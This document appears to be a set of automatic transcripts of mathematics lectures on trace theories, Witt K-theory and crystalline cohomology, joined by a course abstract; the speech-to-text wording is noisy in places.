composable pair there is also some map which some isomorphism is between the gamma of composition and composition of the gums so these are objects and morphisms are the following so you have some let me do another board some morphisms you have some N gamma you have some N prime gamma prime and the morphisms of is a pair f is just a map prime and then why so I have this gamma which is a function from N to C I have gamma prime I can compose gamma prime with f and then this fizer map from gamma to f compose to gamma prime compose to the other way around I mean it's a similar two categories of simplex except there instead of this phi there was just a condition because there the things was just a set there were no maps but now it's a two category so now there are maps so there is an extra structure there is a extra and this such a map to know I think so morphism is called Cartesian if this phi is actually inverted doesn't have to be but if it is okay so again we have projection from one of the C to lambda which is for gets gamma for example the fiber over one would be the following so it's a category of pairs C which is an object into category and then f which is an endomorphism or the object C and then of course since C from C to C is a category now there are maps between those f's and this what makes this okay and 
now a general definition trace theory on C with values and some category so E is a functor along the C to E that inverts all Cartesian maps now the terminology is mine but the notions of I mean it surely was discovered sometimes in the 70 by an Australian school and then also Tina mentioned that there was a work by Kate Ponto about well several years ago five years maybe and she said about various trace structures in the apologies so she had a name I think her name was shadow if I remember correctly it's pretty close notion so the notion by itself is not that it's not unique and let's kind of axiomatizes some structures which is in nature so why do I call the trace theory so let's see what this is actually practice what what kind of data this guy consists of explicitly so first of all we have this functor we can restrict it to the favor or what so that's fun here which means that for any C and F I have some object okay but now turns out that the next next piece of data which this gadget provides so now we can consider a fiber over two this is a will quiver with two vertices so consider and the fibers is what so there is an object here an object here and then a map F F right so I have to associate something to this also but then since my e inverse Cartesian maps this can be actually identified with e related that C with coefficients in the composition but on the other hand I can equally well identify it with e at C prime and the composition taken in the other direction so what what I end up with is actually this isomorphism between the two things which is an extra piece of data and this is some kind of trace sort of quotes isomorphism trace just because it satisfies the basic true property of traces which is that trace of a B is the same of trace trace of B a right and so this is the reason for terminology and one can show that this actually I mean this has to satisfy some pretty compatibility condition and then this is the one the one correspondence so essentially I have some kind of fun for a blunder C1 plus these actor trace isomorphisms which satisfy some kind of high compatibility but the reason I bothered with the more invariant categorical definition is of course that I want to do also a homotopy version and for that it's not good to say that it's up to some hair things because you have to specify all those characters it's actually better to use this category lambda C and then the definition is that X so a homotopy trace theory is a factor from lambda C2 spaces now but I only want to consider it up to a weak equivalence of the point wise book equivalence it sits inside this homotopy category of functors and it should be locally constant along all the Cartesian maps so all Cartesian maps in lambda C go to weak equivalence that's the definition let me denote by the full subcategory spent by the homotopy trace theory now if you want you can think about this as some kind of infinity category whatever but actually for me it's not needed it's enough to consider the kind of very naive from what the category where just in words point wise book equivalence is unlimited that without any higher structures so I would not need it okay and now so an observation is that so it's not now easy to describe this thing by explicit there's no more reason because there is an infinite number of them but at least so if I have such a thing then for any C and F I get some kind of space but what's more now I can restrict my attention to the situation when this F is not just some random F but actually they 
didn't stand on and then this sorry okay So, if this f is the identity thing. Then what I have is actually, so there is this projection and I have a whole section of this projection which sends one to C and identity. It actually extends to all the other, 2, 3 and so on. Let me actually denote this by sigma C. And then the function sends everything to, so this is a quiver. I need to specify objects and I need to specify arrows. So all the objects would be C. All the arrows would be just the identity. Right, so there is this section. And then what I can do, I can consider now, I can pull back my tracer X with respect to this section. And this will be a locally constant, a function from lambda to space. So this will be this locally constant cyclic space. And this means that if I have a tracer, then it's value at C identity for any C. It actually comes across the circle action. So carried is a locally constant cyclic option. And in particular, if now I consider not just functions to spaces but functions to spectra, then I get this differential automatically. So tracer produces me lots of things with this circle action. And so now let me give, so this was an abstract general theory, but let me give you an example which is of interest to me. I mean, this is kind of the intended application of the formalism. For example, I take a two category of algebras and bimodors. So let me denote it by more, where this stands for more either objects, associative, unital, let's say flat algebras, and then morphisms from A to B are A, B bimodules of formulae, A opposite times B modules, M flat on one side, flat over B. You can compose this, so this is a well defined two category, so you can consider tracer. Then example number two is a much smaller. So one of the basic examples of a two category is a two category of just a single object. So when you have a single object, you only have the category of its endomorphisms, but it comes equipped with a monoidal structure because you can compose them. So a two category of a single object has the same thing as a monoidal category. And so I can consider kind of the part of this marita category, where the only algebra I consider is k itself. Let me denote this by B k mod. B here stands for classifying space if you want. So there is a single object. Can you say why flatness is necessary? You can get, no, it's actually not necessary. I mean, for the definition, it's not necessary. But there is a theorem which is coming up where this would be important. Formally, you can consider the category. I mean, this will be a larger two category, and you can do that. But there is a theorem coming up. All right, so morphisms in this B k mod R flat k mod. Now, of course, I mean, one two categories are part of another one, as I said. You just restrict one single algebra, which is k itself. So there is an obvious kind of reduction function. You take a trace theory on the large guy. And you restrict it to just the small guy. By the way, when you have the classifying two categories over a monoidal category, then the trace theory on that guy, I called, I mean, I have a paper on this where I called it a trace functor. And then, so it's a trace functor monoidal category. It's exactly this. It's a functor plus isomorphism between f of a tensor B and f of b tensor A. So this is an extra structure. It's an order is excessive, but it's in the literature, so better match. So you can restrict the trace theory to this trace functor. 
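A minimal way to record the structure just described — a trace functor on a monoidal category — in LaTeX. This is only a sketch of the underlying data, with the higher compatibilities suppressed:

\[
F\colon \mathcal{C}\longrightarrow \mathcal{E},
\qquad
\tau_{M,N}\colon F(M\otimes N)\;\xrightarrow{\ \sim\ }\;F(N\otimes M),
\]

functorial in M and N and subject to compatibility conditions; for three objects one asks, roughly, that the two ways of moving the last factor to the front of F(M\otimes N\otimes L) by applying \tau agree.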
And then there is a very useful general statement, which says that it's actually almost an equivalent. So you can recover. This theory from the corresponding trace function. There is a left adjoint adjoint. Not just left adjoint, but the fully faithful adjoint. I called expansion functor some x. So trace theory on the big guy. And you can characterize its essential image. I don't want to give you the definition, but some version of how much the invariance invariance. So which basically holds in practice. So all three series you would want to consider in real life would be in the image. So the image. So the essential image. Can be described. So this is a bit of a miracle. And as you see, I was mostly interested in the originally in commutative algebras, but now expanded my generality non commutative algebras. Now I allowed by models. And there is a reason for that. The reason is that you get have this kind of great theorem, which roughly speaking tells you that if you generally sufficiently far, you allow algebras and by modules. Then you can get rid of algebras. So if you know the trace theory for just key, but with coefficients in arbitrary vector space, then you recover your trace theory for all algebras and all by models. And then what you're interested in is of course, some algebra plus the identity and plus the diagonal by model. But the place to generalize the story because then it reduces to just key. Okay, so this is a general thing. And of course, even if you construct a trace theory for some other methods, it's very useful to compare between two different points. So if you have some map. And you want to show the synasomorphism. It's enough to do it on the trace functional level just for key because once it's fully faithful embedding. So once an isomorphism there, it's an isomorphism everywhere. I don't have to really prove it. Machine gives it to you. Okay, and now the punchline. The punchline is of course, is that my with K theory can be promoted to hermode to be trace theory. In fact, it's almost all. So let me show. So this is down. So with K theory. So it used to be defined just for a single algebra. Now I need an algebra a. And then a by model. The model or a opposite. What I do and it's flat on one side. So what I do I consider the tensor algebra. Over a just the usual. I can't don't keep it. So I take the two sided ideal generated by m to the power of plus one and higher and I take the portion. I define completed key theory. As before simply just as a well, a more appealing respect to M. Of the strong heating guys. Then I observe as before that there is a limitation map to a which is split. So I define the definition right. So it's a statement that is completed. The algebra. Splits into K theory of a plus something else, which I want to call with K theory of a with coefficients in M. And then it also carries those endomorphies defined exactly as before because this is key theory. So the formal power series is of course the tensor algebra of the diagonal by model. But for any by model I can consider models of this algebra and then by the same. Wasting which I had last time and which I had an opportunity to recall in the beginning of this lecture. Fortunately, because of the question by Willie, it's works again in exactly the same way. And defines those endomorphisms. Again square to square to end and if now my case be local, then the whole thing you can show that this is a local you can take the kernel so you get the typical. 
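In symbols, the definition just given can be summarized as follows. This is a sketch in notation chosen for this summary (T_A(M) for the tensor algebra, \mathbb{W}K for the lecture's "Witt K-theory with coefficients"), and the truncation convention is only meant to reflect what was said above:

\[
\widehat{K}(A,M)\;:=\;\varprojlim_{n}\,K\!\bigl(T_A(M)\,/\,T_A(M)^{\geq n+1}\bigr),
\qquad
\widehat{K}(A,M)\;\simeq\;K(A)\;\oplus\;\mathbb{W}K(A,M),
\]

where T_A(M) = A \oplus M \oplus (M\otimes_A M)\oplus\cdots is the tensor algebra of the bimodule M over A, the quotient is by the two-sided ideal generated by tensors of degree at least n+1, and the second summand in the splitting is, by definition, the Witt K-theory of A with coefficients in M.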
And the lemma is that all these guys are naturally how much they're still. Let me do the big one but small one. On this two category. Algebra. And I call it a limit not a proposition. I mean it's kind of important for the business but it's also very, very simple. Show must stop this. So how do you do this. So we know what we want when it's an algebra and the by module. So we know how the way is about race theory on this fiber lambda C1. So how to define it on lambda C1. So here we have. So what's an object here. It's again a. So you have some algebras here. Zero. One. So one. And you have some by modules. Zero. Zero one. If you want one, two and so on. What you do you take just. And now I have some flexibility right. I mean I didn't say that my a is k or anything. It can be anything. So I just take a which is just the direct sum of those. I. It's an algebra. And m which is the direct sum. Of those. I plus one. It's a by module. Respect to this by model structure, which is obvious here. If you if you write in block form. It will have zeros everywhere except for the permutation cycle. So. Particular we will have nothing on the dialyinal. But we'll have something. When you off diagonal by one. And then. So what you can do you can consider. Yeah. You can consider with key theory of. And then it's very easy to prove that this actually. Anonyms are more effective with key theory of. Say a zero. With confusions in the product. So you have a cycle you can take the product. And zero one times a one. And one two. Time so on. Until then. And the reasons basically coolings there is such. So key theory is in in in variant of a category in this case the category is the category of so let me go back. The category here is the category of modules over this algebra. But this is the same as basically presentations of the cure. So what's the model here or every vertex you have some P. Which is a module over a PI which is a model over a I and then M's act. And then you can consider the subcategory of modules such that. Its value at zero is zero. And this category would have a final iteration was a certain grid cushions are just modules over a I. Which means that it's K theory would be just K theory the sum of K theories of a I where I is different from that. All the M's would disappear. Because you know when you have a matrix algebra. When you have an algebra which is written in a matrix format everything is upper triangular. It's only their terms on the diagonal that matter. It's basic property of K theory which says that it has this kind of a dTv to property when you have. An extension of two categories that K theory only depends on the categories and not on the extension date. So you can forget the extension. And then of course so there is a subcategory where the term at zero is just zero and the portion by that. Is exactly modules of free algebra over I mean a zero and then this module which is a composition. So the point is that modules over tensor algebra is a category which is very simple. It has a logical dimension one. So in this case you can analyze it completely. You can split it to parts. And you see that the difference between K groups are just K groups of the terms which we remove. And when I go to with K theory which I remind you is something where again I already took the constant term out. Then the result is that the two things are completely obvious. So I could write this down probably but to take too much space with the simple technology. So let me just say that this follows by David Sachs. 
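A sketch of the computation behind the lemma, in the notation of the previous display and assuming the cyclic block arrangement described above (indices taken mod n+1):

\[
A \;=\; \bigoplus_{i=0}^{n} A_i,
\qquad
M \;=\; \bigoplus_{i=0}^{n} M_{i,\,i+1},
\]
\[
\mathbb{W}K(A, M)\;\cong\;\mathbb{W}K\bigl(A_0,\; M_{0,1}\otimes_{A_1} M_{1,2}\otimes_{A_2}\cdots\otimes_{A_n} M_{n,0}\bigr),
\]

with M placed just off the diagonal in block form; the point, as explained above, is that by additivity (devissage) the K-theory of the resulting upper-triangular situation only sees the diagonal terms, and the constant part has already been split off in the definition of \mathbb{W}K.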
And this only works because the tensor algebras are so simple. So it's logical dimension one. And for me this is the main reason which kind of to say that the whole theory wants to be non-commutative. Because if you stay in the commutative world then you can also consider free commutative variables but those would be more difficult. I mean algebra of polynomials and n variables has a logical dimension n. But if you look at non-commuting polynomials in any variables could be infinite number of them. It's still a logical dimension. I saw tricks like this one. So the upshot is that my with K theory more or less directly without any effort. Before erasing the white boards there is a question was the lambda cn plus square bracket n plus one instead of square bracket n? Yes. Because I start from zero, right? Yes. Sorry. It wasn't plus one. It's all this numbering thing. Yeah. Sorry about that. Okay so the upshot. W. And also the same is true for the particular. W. W. K. W. K. W. K. W. K. W. K. W. K. W. K. W. K. W. M for arbitrary M. W. K, right? Now there is a miracle coming up specific for the case for now. Up to now K could be anything but now let me specify, well I mean it should be local if you want to take it for position but now let me reduce the case where K is a perfect field. So if k perfect characteristic p, and there's a theorem, and this I should attribute, this is definitely due to Lars, and this is actually fantastic. So with k theory, I mean, his terminology is different, but it's a statement of k m, zero unless, so you only get anything in a single degree, and everything else is just zero. I mean, the way he proves it, it's really high tech. So he basically uses this, done as McCarthy theorem, which is a version of Goodwill theorem, which shows how k theory changes when you're doing the intasible deformations, in terms of TC, and then he does the computation with a tensor algebra, and I mean, it's a highly retrieval computation, and then everything just cancels out. If we were to know a direct proof of this, the whole theory would simplify enormously, but I don't know directly. I mean, it looks deceptively simple. Essentially, you're computing a completed k theory of tensor algebra, but tensor algebra has more homological dimension one, so you expect there to be something very simple, but I don't know any argument which would go like that, without the honest computation. And then in degree zero, it's of course highly retrieval. And so to finish today, let me just roughly speaking tell you what you get, what's the shape of things you get on degree zero. I mean, not zero, but one. I mean, there's a shift by one, that's k one. Degree one. So essentially what I get is a function from vector spaces to a billion groups. So in fact, we have a billion groups. So let me denote it just simply by W. Some kind of polynomial function of vector, so it's a function from k vector to a billion groups. It actually comes with the filtration, so it's actually complete. It's an inverse limit of a certain natural power. And the terms of the power, you cannot really describe them directly. I think the definition is the easiest way to describe them. Of course, it's just k one, so it's not that difficult. It's basically just the realization of the groups of matrices. I think actually there is a recent reference by Nikolaos and maybe Krause, I'm not sure. Well, this is worked out in writing, so it's an archived preprint from this year. I also have a paper on this which is not finished. 
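Stated compactly, the vanishing theorem and the resulting object look like this (a sketch; the single nonzero degree and the completeness claim follow the statements above, and W_n denotes the terms of the natural filtration mentioned there):

\[
\mathbb{W}K_m(k, M) \;=\; 0 \quad\text{for } m \neq 1,
\qquad
W(M)\;:=\;\mathbb{W}K_1(k, M)\;\cong\;\varprojlim_n W_n(M),
\]

a functor from k-vector spaces to abelian groups, complete with respect to this filtration.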
But the point is that it's an iterated extension, so there's Wn of m, Wn plus one of m. And the kernel is the cyclic power, so it's m to the power n, co-invited with respect to sigma, where the sigma is just the order n, and the co-invited with respect to sigma, so it's a co-invited by z mod n. Of course, if it were split, this would just be zero Horses homology of the tensor algebra. And this thing is a twisted version of that, so it has a filtration such that it should associate great quotient with that. And if you want the p-typical guys, then they correspond to powers of p instead of all n's. So there is, right, correct, correct, so thank you, Yuri. This is Nikolaos Krause, but another paper by Nikolaos Krause and other people. Krause and Nikolaos. So for p-typical guys, it's the same, but you would only get powers of n would be a power of p. So there's also some natural filtration, so the rate of cyclic power, and so this is something which is very, very concrete in the order. So when I said in my first lecture that I'm not going to prove comparison between Wittke theory and Hoxley-Wittke, and the Rambit, but I will show you that Wittke theory is computable. This is basically what I meant. So by general machine of trace theory, it reduces the computation for just k. And in that case, it's a very, very concrete factor. There is nothing even hypothetical about it anymore. It's a factor from vector spaces to a billion loops, which you can analyze by hand, construct directly, and so on and so forth. Okay, I think that's enough for today. And on my last lecture on Monday, I think I will discuss a little bit the cyclotomic structure which this thing has, which we saw in Tina's lectures on Tuesday, but which in my lectures hasn't yet come up, so it will come up on Monday. Okay, thank you very much. Okay, thank you very much indeed. And let's thank the speaker for an interesting talk. Any questions at all or comments? We received a question from Remy at the end of the proof of the lemma. How has was the trace ultimately defined? Okay, so I need to define the point is that it's inconvenient to define the trace. I directly define trace theory, which is a value of, so it's a function of this lump, the lump, the lump, the C. And the trace comma comes out when you when you do this comparison is over. So basically, if you want the trace, you take a and B, you take a plus B, and then M plus N, which is the off diagonal by module. You compute with K theory of that. And you see that it has comparison with two guys with a theory of a of coefficients in the product. So let me maybe write this. Let me do the computation. I mean, not do the computation, but right, right. So if you have a, B, M and M, you do this. And there is direct comparison map, which is just, you know, it's a fun to be doing the categories. So this to this of a of coefficients in M, B. Just because the category of modules of this tensor algebra, which is in the first line contains as a full subcategory, the category of models of the tensor algebra of M times. And over a. And then you do the same at B and that raises composition of this guy and then verse to the other. So that that's roughly how it goes. Thank you. Another question. In the definition of the category lambda capital. What happens to the story if you allow maps of any degree and not just of degree one. The questions will appear on one. So, I'm going to extract you have to very good question but it's exactly what I'm going to discuss. My third lecture. Okay. 
Very good question. We deserve the one hour answer. Any other questions or comments. Thank you. Thanks. Thanks. Thanks. Dmitry again and next lecture will be by Tina. Thank you.
|
Motives were initially conceived as a way to unify various cohomology theories that appear in algebraic geometry, and these can be roughly divided into two groups: theories of étale type, and theories of crystalline/de Rham type. The obvious unifying feature of all the theories is that they carry some version of a Chern character map from algebraic K-theory, and there is a bunch of “motivic” conjectures claiming that in various contexts, this map can be refined to some “regulator map” that is not far from an isomorphism. Almost all of these conjectures are still wide open. One observation whose importance was not obvious at first is that K-theory is actually defined in a much larger generality: it makes sense for an associative but not necessarily commutative ring. From the modern point of view, the same should be true for all the theories of de Rham type, with differential forms replaced by Hochschild homology classes, and all the motivic conjectures should also generalize. One prominent example of this is the cyclotomic trace map of Bökstedt–Hsiang–Madsen that serves as a non-commutative analog of the regulator in the p-adic setting. While the non-commutative conjectures are just as open as the commutative ones, one can still hope that they might be more tractable: after all, if something holds in bigger generality, its potential proof by necessity should use much less, so it ought to be simpler. In addition to this, the non-commutative setting allows for completely new methods. One such method is the observation that Hochschild homology is a two-variable theory: one can define homology groups of an algebra with coefficients in a bimodule. These groups come equipped with certain natural trace-like isomorphisms, and this has already allowed one to prove several general comparison results.
|
10.5446/50949 (DOI)
|
Right, so the title is on the blackboard. It's going to be three lectures. And I'm very grateful to the organizers for setting this up in the first place, and then for persevering and doing it in this format — better than nothing. I mean, there are real issues now which don't appear in normal conferences. So I have to apologize: today I have to finish five minutes earlier and run away to another seminar in Moscow — like going from Paris to Moscow in five minutes. So today I will not be able to take questions right after the talk, but I will also give a lecture on Thursday and then on Monday next week, and you are more than welcome to ask questions then. Right, so what I want to give you is some kind of overview; there will not be that many proofs, and maybe not that many theorems even. It is rather a viewpoint on motives from something which eventually will be non-commutative, but that will come along kind of naturally. And I have to apologize again: it is a long story which developed over the years in a kind of strange way. My own background is in algebraic geometry — this is where I come from, and this is where some of the story comes from originally — but a large part of it was actually developed by algebraic topologists. We saw some of it in Tina's great talk yesterday, and we will see more of it today in her third lecture. And since I am not an algebraic topologist, I might not be very good at saying who proved what. I hope the statements I give you are correct, but maybe I will miss some attributions, and I apologize in advance for that. It is very good that we also have a course by Tina on this Bökstedt–Hsiang–Madsen work, which forms a very important part of the story, so I feel kind of covered on that part. Anyway, let me start from algebraic geometry — and even not algebraic geometry, but kind of usual geometry. So if we have some X which is a C-infinity manifold, and we want to consider its cohomology, then as we know there are several ways to define it which all give the same answer. There are many ways, but the most standard ones are as follows. First of all, you can think about homology and represent it by cycles — some actual geometric objects in X — or, if you want, you can do singular homology, with simplices in X. This gives you homology and cohomology with, say, integral coefficients, or any other coefficients you want. This is a nice theory which also works for a topological space — that is one approach. Another approach is that instead of this you can think more homologically: you can think in terms of sheaves on X and sheaf cohomology, or, more classically, you might consider Čech cohomology. So instead of cycles you consider open covers — nice enough open covers — you write down the Čech complex, that kind of thing. Again this gives you cohomology with Z coefficients, or a priori any other coefficients. And then there is a third thing, which is specific to manifolds now, and this is de Rham cohomology. It has no choice of coefficients — the coefficients are the real numbers — classes are represented by differential forms, and it gives you the same result. I mean, it gives the same result when you compare: de Rham cohomology is the same as the usual, say, singular cohomology with coefficients in R. So all of them give the same result. And they share some properties which are kind of natural when you want to think about something as a cohomology theory.
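To fix notation for the comparison just described, here is the standard statement in LaTeX — a general fact about smooth (paracompact) manifolds, recorded only for reference:

\[
H^\bullet_{\mathrm{dR}}(X)\;=\;H^\bullet\Bigl(\Omega^0(X)\xrightarrow{\ d\ }\Omega^1(X)\xrightarrow{\ d\ }\cdots\Bigr)
\;\cong\;H^\bullet_{\mathrm{sing}}(X;\mathbb{R})
\;\cong\;\check{H}^\bullet(X;\underline{\mathbb{R}}),
\]

where the last term is Čech cohomology with coefficients in the constant sheaf, computed on a good cover.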
So, first of all, the thing is homotopy invariant. If you take your X and multiply it by an interval — say, if you want to do de Rham, maybe an open interval, so that it is still a manifold — then you get the same thing as before. And then there is a version of this which in the C-infinity setting is basically the same statement, but let me state it separately nonetheless. If you have a family of manifolds — for example a submersion — and you consider the cohomology of the fibers, then these form a local system downstairs, so they are locally constant: the fiber over a point depends on the point only locally constantly. Again, this has several incarnations. You can consider relative cohomology, which gives you a locally constant sheaf downstairs; with de Rham cohomology, you get a vector bundle downstairs with a flat connection. The point is that if you move along the base of your family, the cohomology does not change. Okay, now let's go to the algebraic setting. And the point is that in the algebraic setting all three approaches survive to some extent, but now they give you different things. Let me stick to smooth for now: a smooth algebraic variety over, let's say, a field k. Well, the first approach, the geometric approach based on cycles — after you think long and hard and invoke the appropriate theorems — gives you what are known as Chow groups. Chow groups, or algebraic K-theory; the two things are intimately related. Maybe K-theory is more important for me because it is somehow more fundamental, but the point is that this is a very good theory in the sense that it is really intrinsic. You do not impose anything on your variety, you just work with whatever is there already — cycles for Chow groups, or vector bundles and complexes for K-theory — but it is intrinsic. Very interesting, but hard to compute; it is notoriously hard to get a handle on. Okay, so that is the story: this is kind of the best replacement for singular homology in the geometric sense. Now, the story about Čech coverings. Well, the reason this worked in usual topology is that you can always cover your C-infinity manifold by open sets which are small enough to be contractible. Algebraically this is not possible anymore, because if you take an algebraic variety, the only topology you have a priori is the Zariski topology, and even the smallest possible open cover will not be contractible at all. So if you are over C — say you have a curve over C and you remove points, and that is the only thing you can do, remove points — you end up with an open curve with many points removed, and it is not contractible at all; the more points you remove, the more non-contractible it becomes. However, it is always of topological type K(pi, 1), so it is determined by its fundamental group. And then there was this great idea of Grothendieck that you could generalize the notion of a cover: instead of just open subsets, you should also allow coverings of open subsets. And if you develop that idea far enough — and if you are Grothendieck — you end up with the étale topology. Now, this still has some limitations, because in algebraic geometry we can only consider finite covers; we do not have infinite covers. So instead of the whole fundamental group of something, we only get its profinite completion.
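For comparison, here is the standard statement behind the last remark, in LaTeX — for a connected variety X of finite type over the complex numbers (Riemann existence theorem; a general fact, not specific to these lectures):

\[
\pi_1^{\mathrm{\acute{e}t}}(X)\;\cong\;\widehat{\pi_1^{\mathrm{top}}\bigl(X(\mathbb{C})\bigr)},
\]

the profinite completion of the topological fundamental group of the associated complex manifold.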
And as a result you get a theory which is nice, which behaves nicely, but the coefficients have to be — well, it can take finite coefficients, but in practical applications people prefer ℓ-adic cohomology. So the coefficients are Q_ℓ, where ℓ is some prime. In characteristic zero this is fine, but if you are in positive characteristic, then ℓ has to be different from the characteristic of your base field. And the story I am going to present is mostly interesting in the situation where you are in positive characteristic. So the characteristic will be some p, and ℓ has to be different from p. And now there is the third story, the de Rham story. And this again works: de Rham cohomology. It again works nicely, by a theorem, and you can just do the very naive thing: you define differential forms as exterior powers of the cotangent bundle, and you take this algebraically. And then, if you are over C, a non-trivial but true statement is that this computes the same cohomology — any cohomology class can be represented by differential forms with polynomial coefficients. So this works. It also works in characteristic p, but of course here we have a problem, which is that the coefficients of the cohomology theory, by definition, when you are working with de Rham cohomology, are the same as the base field. Originally a lot of this was developed in the course of proving the Weil conjectures, and there people wanted something in positive characteristic but with a cohomology theory whose coefficients have characteristic zero. So there is a kind of extension of this which fixes the coefficients, and which is called crystalline cohomology. De Rham cohomology has coefficients k, but then there is crystalline cohomology, which is sort of better. First of all, it can be defined for a singular variety just as well — X can be singular, it does not have to be smooth anymore. And moreover, it has better coefficients: if we start with something over k, there is a version of the cohomology which is defined with coefficients in the ring of Witt vectors of k. So for example, if your k is just F_p, the prime field, then this will be the p-adic numbers — the p-adic integers. I will speak more about this later. And not only do the theories give you different things, it is not even clear how to compare them. For example, if you want to compare de Rham cohomology and étale cohomology, you see right away that in positive characteristic you cannot do it, because the coefficients are different: one is ℓ-adic, where ℓ is not p, whereas the other one — the de Rham and crystalline story — has coefficients either in F_p, or maybe in Z_p or Q_p, with still the same p. So there is a very interesting and long story about what comparisons you can do, which is called p-adic Hodge theory. It is due to many people — Fontaine and Faltings, and then Beilinson — and in the end I think it was finally completely resolved not very long ago by Bhargav Bhatt, Matthew Morrow, and Peter Scholze. But even there the statement is not obvious — it is not at all easy even to find the context in which a comparison theorem can be stated. And then there is K-theory: normally there is a map from K-theory to either of the other two, but it is very far from being an isomorphism, and you do not expect it to be an isomorphism. What we expect to be able to do, in the best of all possible worlds, is to correct our cohomology theories somehow, so that in the end they compute something which is closer to K-theory.
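To make the coefficient rings explicit, here are the standard definitions in LaTeX, recorded only for reference (X over a field k of characteristic p):

\[
H^i_{\mathrm{\acute{e}t}}(X;\mathbb{Q}_\ell)\;:=\;\Bigl(\varprojlim_n H^i_{\mathrm{\acute{e}t}}(X;\mathbb{Z}/\ell^n)\Bigr)\otimes_{\mathbb{Z}_\ell}\mathbb{Q}_\ell
\qquad(\ell\neq p),
\]
\[
W(\mathbb{F}_p)\;\cong\;\mathbb{Z}_p,
\qquad
W(\mathbb{F}_{p^r})\;\cong\;\text{the ring of integers in the unramified degree-}r\text{ extension of }\mathbb{Q}_p,
\]

so that crystalline cohomology of a variety over F_p indeed has p-adic integers as its natural coefficients.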
So that's the general. But let me now discuss the behavior of all these three theories in respect to those standard operations, which I mentioned in the beginning. So sort of homotopy invariance properties. So. Homotopy invariance. Here the story is again slightly different, because we don't have an interval anymore. An interval is not a algebraic thing. You can either take the whole line, which is a fine line, or you can think really in the infinitesimal. You can take, I mean, we can do it in the usual topology, but we can do it in algebraic geometry. So we can consider infinitesimal neighborhood of a very small neighborhood. And here the et alc homologies is behaves exactly as you expect. A homology theory to behave. So first of all, it's what is known. So I think the terminology is due to wave-wise care. It was not originally. I mean, it originally was not thought it was, it could be very useful. So it's kind of a great discovery. Wave-wise care that this leads to very interesting theories. So the property is called a y homotopy invariance. And this means that the homology of some x, which means what you think it means. If you multiply x by the fine line, you get the same thing. And this kind of a global state. And another important thing here is that the banner is that k theory behaves similarly in the same way. If you localize it at some L, or maybe complete some L, you can do some L with the same provisor as before. So L is not equal to characteristic. By the way, if there are any questions along the way, I don't think I can see it very well. So if some, I don't know, it could be great. Dmitry, sorry to have interrupted you. For Chris, let me go back to that slide. So, where W of k, F of dF. Yeah, the question is. So k will be the residue field. And co-efficiency is W of fraction of W. Either, I mean, there are both. There is W k, you can take the fraction. I was about to answer, but okay. And then, and for k theory, this actually hailing on trivial statement in the end, which this is, I mean, just what I wrote is actually easier, but some generalization are not. So, this is basically a discovery of Susan, which is called Susan. And then another thing which I mentioned, you can work with large bridge geometry is infinitesimal. And this is again, just true. So it's a homology of some x, which is maybe non reduced, maybe some kind of infinitesimal neighborhood of x and some ambient right is exactly the same as the homology with reduction. Doesn't feel an important. So this is the story for. Now, k theory. So as I said, if you consider k theory, they find k-efficient or completed at some L, then it's fine, but then generally, it's important to realize that k theory is not a one or more to be in a while. Well, it is if access smooth. But as I said, all the theories actually makes sense for for singular accents useful to consider them in full generality. So and for so for smooth access still true, but if you just multiply by a fine line, the k theory doesn't change. It's one of the basic theorems of William when he can develop. But in general for singular x is just not true. And it's not infinitesimal. Like this. It's not true anymore that k theory of x is the same as k theory with reduction. So if we consider some kind of infinitesimal neighborhood, then k theory would change very much. In fact, we already saw this yesterday is an intense lecture where you consider, for example, well, basic example, the mod p and the mod p square and k theory of the mod p. 
We know k theory of the mod p square. We don't even know. So that I mean, not completely different, but they change drastically. There's a whole story about how k theory changes when you're doing infinitesimal deformations. So, so in this sense, k theory is not is not does not behave in the way you would expect. So here it's maybe it's useful to mention that there is a complete, especially if you're in positive characteristics, there is this complete dichotomy. So you can sort of take your k theory and localize it. That's some prime different from the character. Or at the prime equal to the. And the answers are totally different. We're ready for the point. So if you just consider the point, both have been computed by by Quillen. But the answers are different. So if you computed L k efficient L not equal to P. Then I get some kind of both period is to get some polynomial algebra in one generator. Well, if you do it, the bar maybe. So it's kind of similar to topological. And if you do it at P. Then k theory of a point only, there's only K zero, there's nothing else. So already here, the behavior is different. But when you start. Say taking some kind of intasimal neighborhood of a point. So for example, lifting it to Z mod P. P to the power n, or maybe consider truncated polynomials. Then there is this relative K theory, which we saw. And that relative K theory is entirely P local. So if you look at the, if you look at the, if you look at the relative K theory is entirely P local. So if you localize that L, you get rigidity doesn't change. And if you look at P, then it changes very much. So the two kind of stories have been very different. And the kind of P local story is not at first similar to promote. And now the crystalline come over here. There is a question, does there any kind of a one invariant K theory? You can force K theory be to be a one of a rent. But for my purposes, this exactly what you don't want to do, because it completely kills off what you want to study. This is some kind of the hotline. So there's like the whole theory of motives of way was he's kind of based on the ideas that things should be a one and one. And it really leads you very far when you do a logic stuff. But for P addict stuff, I don't think it's, I think it's basically kills off the interesting. So I would prefer not to do that. But even before you go to K theory, which is very difficult to discuss what happens with the same come on. And here it's like this. So it's kind of an infinitesimal invariant. I mean, not completely in the war. So at least if you have a family, it's kind of locally constant. So you have a family and you look at the fibers, then downstairs you get a bundle of that connection. Of course, the problem is that say if you, if you don't even do crystalline, but say do just the Ramco amology in positive characteristics, it's true that you get a flat connection. It's the same story over any base field. The problem is, of course, that in characteristic P flat connections give you give you less than you expect. So it doesn't give you like a trivialization to all orders. But at least it gives you a trivialization of some kind of what they call Frobenius neighborhoods up to the power of pure arcade. And in general, I think the full statement is that Christian gamology doesn't change if you do some kind of thing with this neighborhood, which has an additional structure called divided powers. So there is some some story you can do you can do that kind of local account. 
But certainly not a one hundred. Not a one. I'm not being like. So now I have to. Yeah. So geometric reason. I don't give you the definition of crystalline commons in the rough K theory. Well, because there is no time of course but also because it's not that important what's important is the properties. And the basic property of crystalline commons which you need to know is the following so if you have some x or this cake. Sorry. Okay. And for now let me fix K to be perfect. Perfect. Characteristic. And it can happen that the thing can be actually lifted to something defined over the sweet vectors. W of K. There are some kind of leaf that always happens. If it happens, then the crystalline homology of X just confused the drama homology of this link. And if you have a lifting. Comology of X is the same as the drama come on. And if you look at something like projective line, for example, you have a So Chris telling how much you have to one is what you expected to be. So there's this base, which is W of K is one dimensional there's a special point in the base and the fiber of special point is pure. And then you want to. Okay. So, I want to consider a one, you just take some point, the special fiber and remove. There is no one does this have a lift. Well, it does have a lifting but it's not what you expect. So here we have a one. One minus infinity. This lifting is not this minus any kind of lifting. Formula by definition this X twiddle has to be a decal complete. So you have to complete this means that you're not only remove one point. One, one point would correspond to remove, you know, a single section of your family. So basically remove all the sections which pass through this point infinity to remove this, this, this, this, all this has to be removed. And in the end, you end up with lots of hole in the general fiber of your story, lots of holes in the general fiber of your lifting. So it's not just P one minus infinity. Basically P one minus anything we 